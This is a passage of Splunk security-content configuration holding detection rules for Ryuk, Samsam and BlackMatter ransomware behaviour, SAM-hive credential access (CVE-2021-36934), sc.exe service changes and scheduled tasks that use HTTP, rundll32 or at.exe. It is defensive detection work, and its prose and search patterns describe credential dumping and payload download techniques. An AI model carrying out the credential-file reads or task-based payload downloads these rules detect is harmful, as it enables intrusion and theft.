action.escu.eli5 = This Splunk query identifies the use of Wake-on-LAN utilized by Ryuk ransomware. The Ryuk Ransomware uses the Wake-on-LAN feature to turn on powered off devices on a compromised network to have greater success encrypting them. This is a high fidelity indicator of Ryuk ransomware executing on an endpoint. Upon triage, isolate the endpoint. Additional file modification events will be within the user's profile (\appdata\roaming) and in public directories (users\public\). Review all Scheduled Tasks on the isolated endpoint and across the fleet. Suspicious Scheduled Tasks will include a path to an unknown binary and those endpoints should be isolated until triaged.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited to no known false positives.
action.escu.creation_date = 2021-03-01
action.escu.modification_date = 2021-03-01
action.escu.confidence = high
action.escu.full_search_name = ESCU - Ryuk Wake on LAN Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ryuk Ransomware"]
action.risk = 1
action.risk.param._risk_message = A process $process_name$ with wake on LAN commandline $process$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Ryuk Wake on LAN Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ryuk Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This Splunk query identifies the use of Wake-on-LAN utilized by Ryuk ransomware. The Ryuk Ransomware uses the Wake-on-LAN feature to turn on powered off devices on a compromised network to have greater success encrypting them. This is a high fidelity indicator of Ryuk ransomware executing on an endpoint. Upon triage, isolate the endpoint. Additional file modification events will be within the user's profile (\appdata\roaming) and in public directories (users\public\). Review all Scheduled Tasks on the isolated endpoint and across the fleet. Suspicious Scheduled Tasks will include a path to an unknown binary and those endpoints should be isolated until triaged.
action.notable.param.rule_title = Ryuk Wake on LAN Command
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*8 LAN*" OR Processes.process="*9 REP*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ryuk_wake_on_lan_command_filter`

[ESCU - SAM Database File Access Attempt - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies access to the SAM, SYSTEM or SECURITY databases within the file path of `windows\system32\config` using Windows Security EventCode 4663. This particular behavior is related to credential access, an attempt to either use a Shadow Copy or the recent CVE-2021-36934 to access the SAM database. The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies access to the SAM, SYSTEM or SECURITY databases within the file path of `windows\system32\config` using Windows Security EventCode 4663. This particular behavior is related to credential access, an attempt to either use a Shadow Copy or the recent CVE-2021-36934 to access the SAM database. The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords.
action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663. For 4663, enable "Audit Object Access" in Group Policy. Then check the two boxes listed for both "Success" and "Failure."
action.escu.known_false_positives = Natively, `dllhost.exe` will access the files. Every environment will have additional native processes that do as well. Filter by process_name. As an aside, one can remove process_name entirely and add `Object_Name=*ShadowCopy*`.
action.escu.creation_date = 2023-06-13
action.escu.modification_date = 2023-06-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - SAM Database File Access Attempt - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - SAM Database File Access Attempt - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-36934"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` (EventCode=4663) process_name!=*\\dllhost.exe Object_Name IN ("*\\Windows\\System32\\config\\SAM*","*\\Windows\\System32\\config\\SYSTEM*","*\\Windows\\System32\\config\\SECURITY*") | stats values(Accesses) count by process_name Object_Name dest user | `sam_database_file_access_attempt_filter`

[ESCU - Samsam Test File Write - Rule]
action.escu = 0
action.escu.enabled = 1
description = The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation.
action.escu.how_to_implement = You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.
action.escu.known_false_positives = No false positives have been identified.
action.escu.creation_date = 2018-12-14
action.escu.modification_date = 2018-12-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Samsam Test File Write - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["SamSam Ransomware"]
action.risk = 1
action.risk.param._risk_message = A samsam ransomware test file creation in $file_path$ in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 12}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 12}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Samsam Test File Write - Rule
action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 20, "impact": 60, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation.
action.notable.param.rule_title = Samsam Test File Write
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_name) as file_name from datamodel=Endpoint.Filesystem where Filesystem.file_path=*\\windows\\system32\\test.txt by Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `samsam_test_file_write_filter`

[ESCU - Sc exe Manipulating Windows Services - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search looks for arguments to sc.exe indicating the creation or modification of a Windows service.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543.003", "T1543"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for arguments to sc.exe indicating the creation or modification of a Windows service.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model.
Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Using sc.exe to manipulate Windows services is uncommon. However, there may be legitimate instances of this behavior. It is important to validate and investigate as appropriate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Sc exe Manipulating Windows Services - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Service Abuse", "DHS Report TA18-074A", "Orangeworm Attack Group", "Windows Persistence Techniques", "Disabling Security Tools", "NOBELIUM Group", "Azorult", "Windows Drivers"] action.risk = 1 action.risk.param._risk_message = A sc process $process_name$ with commandline $process$ to create of configure services in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Sc exe Manipulating Windows Services - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Service Abuse", "DHS Report TA18-074A", "Orangeworm Attack Group", "Windows Persistence Techniques", "Disabling Security Tools", "NOBELIUM Group", "Azorult", "Windows Drivers"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": 
["T1543.003", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for arguments to sc.exe indicating the creation or modification of a Windows service. action.notable.param.rule_title = Sc exe Manipulating Windows Services action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = sc.exe (Processes.process="* create *" OR Processes.process="* config *") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sc_exe_manipulating_windows_services_filter` [ESCU - SchCache Change By App Connect And Create ADSI Object - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect an application try to connect and create ADSI Object to do LDAP query. Every time an application connects to the directory and attempts to create an ADSI object, the Active Directory Schema is checked for changes. If it has changed since the last connection, the schema is downloaded and stored in a cache on the local computer either in %LOCALAPPDATA%\Microsoft\Windows\SchCache or %systemroot%\SchCache. We found this a good anomaly use case to detect suspicious application like blackmatter ransomware that use ADS object api to execute ldap query. having a good list of ldap or normal AD query tool used within the network is a good start to reduce the noise. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is to detect an application try to connect and create ADSI Object to do LDAP query. Every time an application connects to the directory and attempts to create an ADSI object, the Active Directory Schema is checked for changes. If it has changed since the last connection, the schema is downloaded and stored in a cache on the local computer either in %LOCALAPPDATA%\Microsoft\Windows\SchCache or %systemroot%\SchCache. We found this a good anomaly use case to detect suspicious application like blackmatter ransomware that use ADS object api to execute ldap query. having a good list of ldap or normal AD query tool used within the network is a good start to reduce the noise. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = normal application like mmc.exe and other ldap query tool may trigger this detections. 
action.escu.creation_date = 2021-09-07 action.escu.modification_date = 2021-09-07 action.escu.confidence = high action.escu.full_search_name = ESCU - SchCache Change By App Connect And Create ADSI Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["BlackMatter Ransomware"] action.risk = 1 action.risk.param._risk_message = process $Image$ create a file $TargetFilename$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SchCache Change By App Connect And Create ADSI Object - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1087"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 TargetFilename = "*\\Windows\\SchCache\\*" TargetFilename = "*.sch*" NOT (Image IN ("*\\Windows\\system32\\mmc.exe")) |stats count min(_time) as firstTime max(_time) as lastTime by Image TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schcache_change_by_app_connect_and_create_adsi_object_filter` [ESCU - Schedule Task with HTTP Command Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the registration of suspicious tasks on 
Windows using the Windows Security EventCode 4698, "A scheduled task was created." It specifically looks for tasks registered through schtasks.exe or TaskService that have command arguments containing the string "HTTP." This behavior is often associated with malware or attacks that utilize Living off the Land binaries (lolbins) to download additional files or payloads to the compromised machine.\ The search returns information about the task, such as the task name, command, author, enabled status, hidden status, and arguments. Upon triage, it is important to identify the source of the scheduled task, whether it was registered through schtasks.exe or TaskService. Review the details of the created task and the command to be executed. Capture relevant artifacts on disk and examine them. Additionally, identify any parallel processes occurring within the same timeframe to determine the source of the attack.\ Implementing this analytic requires ingesting logs with information about task schedules, specifically Windows Security Log EventCode 4698, from your endpoints. It is recommended to tune and filter known instances of task schedules used in your environment to minimize false positives.\ Detecting the registration of suspicious tasks with HTTP command arguments is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is found, further investigation is warranted to analyze the nature and purpose of the scheduled task, identify any downloaded files or payloads, and mitigate the associated risks. The impact of a true positive can vary but may include data exfiltration, malware propagation, or unauthorized access to sensitive information. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the registration of suspicious tasks on Windows using the Windows Security EventCode 4698, "A scheduled task was created." It specifically looks for tasks registered through schtasks.exe or TaskService that have command arguments containing the string "HTTP." This behavior is often associated with malware or attacks that utilize Living off the Land binaries (lolbins) to download additional files or payloads to the compromised machine.\ The search returns information about the task, such as the task name, command, author, enabled status, hidden status, and arguments. Upon triage, it is important to identify the source of the scheduled task, whether it was registered through schtasks.exe or TaskService. Review the details of the created task and the command to be executed. Capture relevant artifacts on disk and examine them. Additionally, identify any parallel processes occurring within the same timeframe to determine the source of the attack.\ Implementing this analytic requires ingesting logs with information about task schedules, specifically Windows Security Log EventCode 4698, from your endpoints. It is recommended to tune and filter known instances of task schedules used in your environment to minimize false positives.\ Detecting the registration of suspicious tasks with HTTP command arguments is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is found, further investigation is warranted to analyze the nature and purpose of the scheduled task, identify any downloaded files or payloads, and mitigate the associated risks. 
The impact of a true positive can vary but may include data exfiltration, malware propagation, or unauthorized access to sensitive information. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the task schedule (Exa. Security Log EventCode 4698) endpoints. Tune and filter known instances of Task schedule used in your environment. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Schedule Task with HTTP Command Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Living Off The Land", "Winter Vivern", "Windows Persistence Techniques", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A schedule task process commandline arguments $Arguments$ with http string on it in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schedule Task with HTTP Command Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Living Off The Land", "Winter Vivern", "Windows Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the registration of suspicious tasks on Windows using the Windows 
Security EventCode 4698, "A scheduled task was created." It specifically looks for tasks registered through schtasks.exe or TaskService that have command arguments containing the string "HTTP." This behavior is often associated with malware or attacks that utilize Living off the Land binaries (lolbins) to download additional files or payloads to the compromised machine.\ The search returns information about the task, such as the task name, command, author, enabled status, hidden status, and arguments. Upon triage, it is important to identify the source of the scheduled task, whether it was registered through schtasks.exe or TaskService. Review the details of the created task and the command to be executed. Capture relevant artifacts on disk and examine them. Additionally, identify any parallel processes occurring within the same timeframe to determine the source of the attack.\ Implementing this analytic requires ingesting logs with information about task schedules, specifically Windows Security Log EventCode 4698, from your endpoints. It is recommended to tune and filter known instances of task schedules used in your environment to minimize false positives.\ Detecting the registration of suspicious tasks with HTTP command arguments is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is found, further investigation is warranted to analyze the nature and purpose of the scheduled task, identify any downloaded files or payloads, and mitigate the associated risks. The impact of a true positive can vary but may include data exfiltration, malware propagation, or unauthorized access to sensitive information. 
action.notable.param.rule_title = Schedule Task with HTTP Command Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 | xmlkv Message| search Arguments IN ("*http*") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden, Arguments | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schedule_task_with_http_command_arguments_filter` [ESCU - Schedule Task with Rundll32 Command Trigger - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of suspicious tasks in Windows, specifically tasks using the rundll32 command. It's implemented using Windows Security EventCode 4698 for A scheduled task was created, and looks for tasks executed either via schtasks.exe or TaskService. This behavior is worth identifying as it is commonly used by malware, such as TrickBot, that leverages rundll32 to execute its downloader.\ If a true positive is found, it suggests an attacker is trying to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes.\ To implement this analytic, ensure you are ingesting logs with task schedule information from your endpoints. Be aware of potential false positives - legitimate uses of Task Scheduler in your environment may cause benign activities to be flagged.\ Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the creation of suspicious tasks in Windows, specifically tasks using the rundll32 command. It's implemented using Windows Security EventCode 4698 for A scheduled task was created, and looks for tasks executed either via schtasks.exe or TaskService. This behavior is worth identifying as it is commonly used by malware, such as TrickBot, that leverages rundll32 to execute its downloader.\ If a true positive is found, it suggests an attacker is trying to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes.\ To implement this analytic, ensure you are ingesting logs with task schedule information from your endpoints. Be aware of potential false positives - legitimate uses of Task Scheduler in your environment may cause benign activities to be flagged.\ Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the task schedule (Exa. Security Log EventCode 4698) endpoints. Tune and filter known instances of Task schedule used in your environment. 
action.escu.known_false_positives = unknown action.escu.creation_date = 2021-04-19 action.escu.modification_date = 2021-04-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Schedule Task with Rundll32 Command Trigger - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Windows Persistence Techniques", "Trickbot", "IcedID", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A schedule task process commandline rundll32 arguments $Arguments$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schedule Task with Rundll32 Command Trigger - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques", "Trickbot", "IcedID", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of suspicious tasks in Windows, specifically tasks using the rundll32 command. It's implemented using Windows Security EventCode 4698 for A scheduled task was created, and looks for tasks executed either via schtasks.exe or TaskService. 
This behavior is worth identifying as it is commonly used by malware, such as TrickBot, that leverages rundll32 to execute its downloader.\ If a true positive is found, it suggests an attacker is trying to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes.\ To implement this analytic, ensure you are ingesting logs with task schedule information from your endpoints. Be aware of potential false positives - legitimate uses of Task Scheduler in your environment may cause benign activities to be flagged.\ Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks. action.notable.param.rule_title = Schedule Task with Rundll32 Command Trigger action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 | xmlkv Message | search Command IN ("*rundll32*") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden, Arguments | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schedule_task_with_rundll32_command_trigger_filter` [ESCU - Scheduled Task Creation on Remote Endpoint using At - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation of suspicious tasks on a remote Windows endpoint using the at.exe command with command-line arguments. This technique is commonly used by red teams and adversaries for lateral movement and remote code execution. 
The at.exe binary leverages the deprecated AT protocol, which may still work on previous versions of Windows. Attackers can enable this protocol on demand by modifying a system registry key. It is important to consider potential false positives. While administrators may create scheduled tasks on remote systems, this activity is typically limited to a small set of hosts or users.\ Identifying the creation of scheduled tasks on remote endpoints is crucial for a Security Operations Center (SOC) because it indicates potential unauthorized activity or an attacker attempting to establish persistence or execute malicious code. The impact of a true positive can be significant, leading to unauthorized access, data theft, or other damaging outcomes. During triage, investigate the source and purpose of the scheduled task, inspect relevant on-disk artifacts, and analyze concurrent processes to identify the extent of the attack and take appropriate response actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the creation of suspicious tasks on a remote Windows endpoint using the at.exe command with command-line arguments. This technique is commonly used by red teams and adversaries for lateral movement and remote code execution. The at.exe binary leverages the deprecated AT protocol, which may still work on previous versions of Windows. Attackers can enable this protocol on demand by modifying a system registry key. It is important to consider potential false positives. 
While administrators may create scheduled tasks on remote systems, this activity is typically limited to a small set of hosts or users.\ Identifying the creation of scheduled tasks on remote endpoints is crucial for a Security Operations Center (SOC) because it indicates potential unauthorized activity or an attacker attempting to establish persistence or execute malicious code. The impact of a true positive can be significant, leading to unauthorized access, data theft, or other damaging outcomes. During triage, investigate the source and purpose of the scheduled task, inspect relevant on-disk artifacts, and analyze concurrent processes to identify the extent of the attack and take appropriate response actions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may create scheduled tasks on remote systems, but this activity is usually limited to a small set of hosts or users. 
action.escu.creation_date = 2021-11-11 action.escu.modification_date = 2021-11-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled Task Creation on Remote Endpoint using At - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A Windows Scheduled Task was created on a remote endpoint from $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Scheduled Task Creation on Remote Endpoint using At - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation of suspicious tasks on a remote Windows endpoint using the at.exe command with command-line arguments. This technique is commonly used by red teams and adversaries for lateral movement and remote code execution. The at.exe binary leverages the deprecated AT protocol, which may still work on previous versions of Windows. Attackers can enable this protocol on demand by modifying a system registry key. 
